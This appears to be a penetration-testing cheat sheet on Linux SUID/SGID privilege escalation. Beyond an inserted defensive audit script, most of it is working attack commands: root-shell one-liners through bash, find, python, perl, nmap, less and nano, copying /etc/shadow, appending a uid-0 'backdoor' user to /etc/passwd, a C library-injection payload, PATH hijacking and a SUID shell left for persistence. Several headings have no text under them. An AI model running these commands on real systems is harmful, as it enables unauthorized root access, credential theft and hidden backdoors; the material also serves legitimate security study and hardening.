Overview
SUID (Set User ID) binaries run with the permissions of the file owner. If the owner is root, the code runs as root regardless of who executes it.
SGID (Set Group ID) binaries run with the file's group permissions.
Find SUID Binaries
find / -perm -4000 -type f 2>/dev/null
Find SGID Binaries
find / -perm -2000 -type f 2>/dev/null
Both
find / -perm /6000 -type f 2>/dev/null
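The find commands above list every set-id file, but a list is only useful against a baseline. The following audit script is an added example, not part of the original page: it parses the output of the page's find command (with a -printf format that adds mode, owner and group), diffs it against a constructed allow-list, and flags set-id files in temp or home directories or that are world-writable. The sample output and baseline are constructed for the example.

```python
import stat
import subprocess

# The page's find command, with fields added: find / -perm /6000 -type f -printf '%m %u %g %p\n'
FIND_CMD = ["find", "/", "-perm", "/6000", "-type", "f", "-printf", "%m %u %g %p\n"]

# Constructed sample output standing in for a real scan
SAMPLE_FIND_OUTPUT = """\
4755 root root /usr/bin/passwd
4755 root root /usr/bin/sudo
2755 root shadow /usr/bin/chage
4755 root root /tmp/rootbash
4757 root root /usr/local/bin/backup-helper
"""

# Constructed baseline: record this from a known-good build of the same image
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chage"}

# Locations where a set-id file is never expected
UNEXPECTED_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_find_line(line):
    """Split one '<mode> <owner> <group> <path>' line; mode is octal, path may contain spaces."""
    mode_str, owner, group, path = line.split(maxsplit=3)
    return {"path": path, "mode": int(mode_str, 8), "owner": owner, "group": group}


def audit(find_output, baseline):
    """Return [(path, [reasons])] for every set-id file that deserves a look."""
    findings = []
    for line in find_output.splitlines():
        if not line.strip():
            continue
        entry = parse_find_line(line)
        reasons = []
        if entry["path"] not in baseline:
            reasons.append("not in baseline")
        if entry["path"].startswith(UNEXPECTED_PREFIXES):
            reasons.append("set-id file under a temp or home directory")
        if entry["mode"] & stat.S_IWOTH:
            reasons.append("world-writable set-id file")
        if reasons:
            findings.append((entry["path"], reasons))
    return findings


if __name__ == "__main__":
    # Run the find command on the live host and audit what it returns
    output = subprocess.run(FIND_CMD, capture_output=True, text=True).stdout
    for path, reasons in audit(output, BASELINE):
        print(f"{path}: {', '.join(reasons)}")
```

Run it periodically (or from a file-integrity job) and alert on any new finding; a set-id copy of a shell under /tmp is exactly the persistence artifact this page ends with.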
GTFOBins
Check every SUID binary against GTFOBins:
https://gtfobins.github.io/#+suid
Common SUID Exploits
bash
bash -p
-p preserves the effective UID (root) instead of dropping it to the real UID.
find
find . -exec /bin/bash -p \;
cp
Copy /etc/shadow out, or overwrite /etc/passwd:
# Read shadow
cp /etc/shadow /tmp/shadow
# Add a root user to a copy of passwd, then put the copy back
# (double quotes so $(...) expands; single quotes would write it literally)
cp /etc/passwd /tmp/passwd
echo "backdoor:$(openssl passwd -1 password):0:0::/root:/bin/bash" >> /tmp/passwd
cp /tmp/passwd /etc/passwd
su backdoor
vim / vi
python
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
perl
perl -e 'exec "/bin/bash -p";'
nmap (Old Versions)
Newer nmap:
echo 'os.execute("/bin/bash -p")' > /tmp/nse.nse
nmap --script=/tmp/nse.nse
env
less / more
less /etc/shadow
!/bin/bash
nano
nano /etc/shadow
# Read the contents, then Ctrl+R followed by Ctrl+X to run a command:
reset; bash -p 1>&0 2>&0
Custom SUID Binary
If you find an unknown SUID binary, analyze it:
Check What It Does
strings /path/to/suid-binary
ltrace /path/to/suid-binary
strace /path/to/suid-binary
Shared Library Injection
Check for missing libraries:
If it loads a library from a writable path:
#include <stdlib.h>
#include <unistd.h>

/* Runs when the library is loaded (built with -nostartfiles, so _init is ours) */
void _init() {
    setuid(0);
    setgid(0);
    system("/bin/bash -p");
}
Compile:
gcc -shared -fPIC -nostartfiles -o /writable/path/lib.so exploit.c
PATH Hijacking on SUID Binary
If the SUID binary calls a command without a full path (e.g., system("cat /etc/shadow")):
echo '/bin/bash -p' > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH
/path/to/suid-binary
Create SUID Binary (If Already Root)
Persistence:
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash
Later: